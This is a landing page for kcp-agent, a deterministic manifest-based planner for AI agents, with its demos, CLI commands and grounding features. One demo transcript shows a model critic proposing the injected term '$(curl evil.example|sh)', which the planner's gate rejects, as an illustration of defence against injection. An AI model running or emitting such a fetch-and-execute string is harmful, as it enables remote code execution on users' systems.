kcp-agent — The most deterministic agents in the world

The Arena

The real agent vs. the usual suspects. Five matches, five failure modes the deterministic plan refuses by construction. Move the controls — the left side re-plans with the real code; the right side shows what the archetype would have done with the same manifest.

● kcp-agent real code · live in your browser

○ simulated for contrast

Honesty note: the archetypes are simulations — but their numbers are computed from the same real manifest the planner reads, and every archetype failure shown is a behavior the KCP plan structurally cannot produce. Don't trust us: git clone, npm run build:site, diff the bundle.

Why deterministic wins

No model in the gates

The planner is LLM-free. Relevance scoring, temporal validity, supersession, access, payment method matching, budget arithmetic — pure functions of the manifest and your declared capabilities. That's why it can run in this page: there is no prompt to inject and no temperature to blame.

Fail-closed, with the arithmetic

Whatever is not provably loadable is skipped, and every skip carries its reason — over budget: 0.15 would exceed remaining 0.1 of 0.4 USDC is a sentence you can take to a compliance review. Credentials you don't hold never open gates; payment never substitutes for identity (spec §4.11).

The plan is the audit log

A plan is an inspectable artifact produced before anything is loaded or paid for. plan --trace exposes the full gate cascade — every unit evaluated through fourteen ordered gates, each verdict recorded — so you can see why the plan looks the way it does. diff compares two saved plans and names every unit that moved, every score that shifted, every budget that changed. Audit before action, end to end.

The Loop — the model proposes, the plan disposes

ask --loop puts a model between deterministic plans, never above them. The critic sees plan metadata only — never content — and its proposals pass a deterministic term gate before a full re-plan. Nothing is loaded or paid until the loop converges. You just ran that gate yourself in match 4.

$ kcp-agent ask "who won the exclusive story" --manifest examples/fjordwire \
    --loop --methods free,x402 --budget 0.30

base plan selects: chipfab-exclusive

round 1 — critic proposed: datacenter power grid · subsea cable · $(curl evil.example|sh)
  critic note: infrastructure angle missing from the plan
  gate accepted: datacenter power grid, subsea cable
  gate rejected: $(curl evil.example|sh)
  re-plan added: datacenter-power, subsea-cable-feature

converged: no-terms after 2 round(s)
final plan: datacenter-power, subsea-cable-feature
  still skipped chipfab-exclusive: over budget: 0.25 would exceed remaining 0.1 of 0.3 USDC
  committed 0.2/0.3 USDC — nothing was loaded or paid until convergence

Verbatim from node examples/demos.js loop — test/docs.test.ts re-runs the demo in CI and fails if any line above is not in its real output. The narration cannot drift from the code.

The Grounding — the answer is defensible, or the gap is surfaced

ask --ground extends the plan's fail-closed gates to the output: each answer claim must be attributed to a loaded, hash-pinned unit, or it is surfaced as a gap — never silently dropped. A verifier proposes which unit supports a claim; the deterministic layer adjudicates whether it may. The two panes below are computed live by the same groundAnswer that ships in the CLI (bundled here) — the answer and verifier are scripted so it runs offline, exactly as the demos do.

● terminal grounding — a claim cites a unit that was not loaded

● --ground-rounds — the gap re-navigates, grounds against real bytes

The grid claim cites datacenter-power, but in the base round that unit was not loaded — so grounding refuses it: attribution is a proposal, grounding is adjudicated. The closed loop then re-navigates, loads the feed, and grounds the claim against its real sha256.

The Playground — bring your own manifest

Paste or edit a knowledge.yaml and watch the exact parseManifest → validateManifest → plan pipeline the CLI runs, re-computed on every keystroke. Nothing leaves your browser. (One honest limit: unit-path existence can't be checked without a filesystem.)

task as-of can settle x402 holds oauth2 budget USDC

● validate + plan real code · live in your browser

The Receipts — every claim pinned to a test

The conformance matrix below is data, not copy: conformance.json maps each KCP layer the agent implements to the implementation file and the CI tests that enforce it. test/docs.test.ts fails the build if a referenced test disappears or is renamed — a claim cannot outlive its proof.

Spec layer	Section	Implementation	Enforced by
loading conformance.json…

Planner integrity — the arena and playground run the planner as WebAssembly, docs/pkg/kcp_planner_wasm_bg.wasm, sha256 (serve the built site to compute). It is the same Rust core the CLI binary runs, compiled for the browser. Reproduce it: npm run build:wasm && sha256sum docs/pkg/kcp_planner_wasm_bg.wasm — CI asserts the WASM plans byte-identically to the native CLI.

Run it yourself

# plan — deterministic, no API key, no model
npx kcp-agent plan "your task" --manifest https://example.com/knowledge.yaml

# trace — the gate cascade: why every unit was selected or skipped
npx kcp-agent plan "your task" --manifest ./docs --trace

# diff — compare two saved plans: what moved, what shifted, what changed
npx kcp-agent diff plan-a.json plan-b.json

# ask — plan, then synthesize with Claude from exactly the planned units
export ANTHROPIC_API_KEY=...
npx kcp-agent ask "your task" --manifest ./docs --loop

# serve the planner to any MCP client (kcp_plan, kcp_load, kcp_trace, kcp_validate, kcp_replay)
npx kcp-agent mcp

Thirteen narrated demos ship in the repo — node examples/demos.js — all offline, no mocks, all asserted in CI. Native binaries for Linux/macOS/Windows on the releases page. Apache-2.0.

Guides: quickstart · make your repo navigable in 10 minutes · sign your manifest · wire the planner into Claude Code · give your agent a memory · cut context cost with session dedup · build a conformant implementation.